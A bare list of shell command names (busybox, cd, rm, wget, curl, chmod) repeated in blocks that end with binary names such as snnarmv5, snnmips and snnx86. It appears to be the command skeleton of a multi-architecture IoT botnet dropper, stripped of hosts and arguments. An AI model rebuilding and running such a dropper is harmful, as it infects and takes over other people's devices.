ulimit
busybox
busybox
busybox
busybox
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnarmv5
cd
cd
rm
wget
busybox
curl
busybox
chmod
snni686
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnmips
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnmipsel
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnpowerpc440fp
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnsparc
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnarmv4
cd
cd
rm
wget
busybox
curl
busybox
chmod
snni586
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnm86k
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnmips64
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnpowerpc
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnsh4
cd
cd
rm
wget
busybox
curl
busybox
chmod
snnx86
rm
